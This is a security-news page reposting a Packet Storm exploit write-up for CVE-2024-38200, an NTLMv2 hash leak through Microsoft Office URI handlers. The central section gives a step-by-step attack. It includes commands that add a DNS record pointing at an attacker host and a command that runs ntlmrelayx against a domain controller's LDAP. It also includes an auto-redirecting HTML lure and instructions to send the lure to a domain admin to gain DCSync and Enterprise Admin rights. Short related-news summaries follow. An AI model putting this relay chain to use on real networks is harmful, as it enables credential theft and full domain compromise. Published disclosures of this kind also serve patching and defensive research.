Security
Headlines
HeadlinesLatestCVEs

Headline

Microsoft Office NTLMv2 Disclosure

Microsoft Office 2019 MSO build 1808 (16.0.10411.20011) and Microsoft 365 MSO version 2403 build 16.0.17425.20176 suffer from an NTLMv2 hash disclosure vulnerability.

Packet Storm
#vulnerability#windows#microsoft#apache#git#ldap#samba#auth

Exploit Title: Microsoft Office NTLMv2 Disclosure Vulnerability

Exploit Author: Metin Yunus Kandemir

Vendor Homepage: https://www.office.com/

Software Link: https://www.office.com/

Details: https://github.com/passtheticket/CVE-2024-38200

Version: Microsoft Office 2019 MSO Build 1808 (16.0.10411.20011), Microsoft 365 MSO (Version 2403 Build 16.0.17425.20176)

Tested against: Windows 11

CVE: CVE-2024-38200

Description

MS Office URI schemes allow for fetching a document from remote source.
MS URI scheme format is ‘< scheme-name >:< command-name >"|"< command-argument-descriptor > "|"< command-argument >’ .
Example: ms-word:ofe|u|http://hostname:port/leak.docx
When the URI “ms-word:ofe|u|http://hostname:port/leak.docx” is invoked from a victim computer. This behaviour is abused to capture and relay NTLMv2 hash over SMB and HTTP. For detailed information about capturing a victim user’s NTLMv2 hash over SMB, you can also visit https://www.privsec.nz/releases/ms-office-uri-handlers.

Proof Of Concept

If we add a DNS A record and use this record within the Office URI, Windows will consider the hostname as part of the Intranet Zone. In this way, NTLMv2 authentication occurs automatically and a standard user can escalate privileges without needing a misconfigured GPO. Any domain user with standard privileges can add a non-existent DNS record so this attack works with default settings for a domain user.

  1. Add a DNS record to resolve hostname to attacker IP address which runs ntlmrelayx. It takes approximately 5 minutes for the created record to start resolving.
    $ python dnstool.py -u ‘unsafe.local\testuser’ -p ‘pass’ -r ‘attackerhost’ --action ‘add’ --data [attacker-host-IP] [DC-IP] --zone unsafe.local

  2. Fire up ntlmrelayx with following command
    $ python ntlmrelayx.py -t ldap://DC-IP-ADDRESS --escalate-user testuser --http-port 8080

  3. Serve following HTML file using Apache server. Replace hostname with added record (e.g. attackerhost).

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Microsoft Office</title>
</head>
<body>
<a id="link" href="ms-word:ofe|u|http://hostname:port/leak.docx"></a>

<script>  
    function navigateToLink() {  
        var link = document.getElementById('link');  
        if (link) {  
            var url = link.getAttribute('href');  
            window.location.href = url;  
        }  
    }  
    window.onload = navigateToLink;  
</script>  

</body>
</html>

  1. Send the URL of the above HTML file to a user with domain admin privileges. You should check whether the DNS record is resolved with the ping command before sending the URL. When the victim user navigates to the URL, clicking the ‘Open’ button is enough to capture the NTLMv2 hash. (no warning!)

  2. The captured NTLMv2 hash over HTTP is relayed to Domain Controller with ntlmrelayx. As a result, a standard user can obtain DCSync and Enterprise Admins permissions under the default configurations with just two clicks.

Related news

AI, election security headline discussions at Black Hat and DEF CON

Voting Village co-founder Harri Hursti told Politico the list of vulnerabilities ran “multiple pages.”

Microsoft Issues Patches for 90 Flaws, Including 10 Critical Zero-Day Exploits

Microsoft on Tuesday shipped fixes to address a total of 90 security flaws, including 10 zero-days, of which six have come under active exploitation in the wild. Of the 90 bugs, seven are rated Critical, 79 are rated Important, and one is rated Moderate in severity. This is also in addition to 36 vulnerabilities that the tech giant resolved in its Edge browser since last month. The Patch Tuesday

Microsoft Warns of Unpatched Office Vulnerability Leading to Data Exposure

Microsoft has disclosed an unpatched zero-day in Office that, if successfully exploited, could result in unauthorized disclosure of sensitive information to malicious actors. The vulnerability, tracked as CVE-2024-38200 (CVSS score: 7.5), has been described as a spoofing flaw that affects the following versions of Office - Microsoft Office 2016 for 32-bit edition and 64-bit editions Microsoft

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution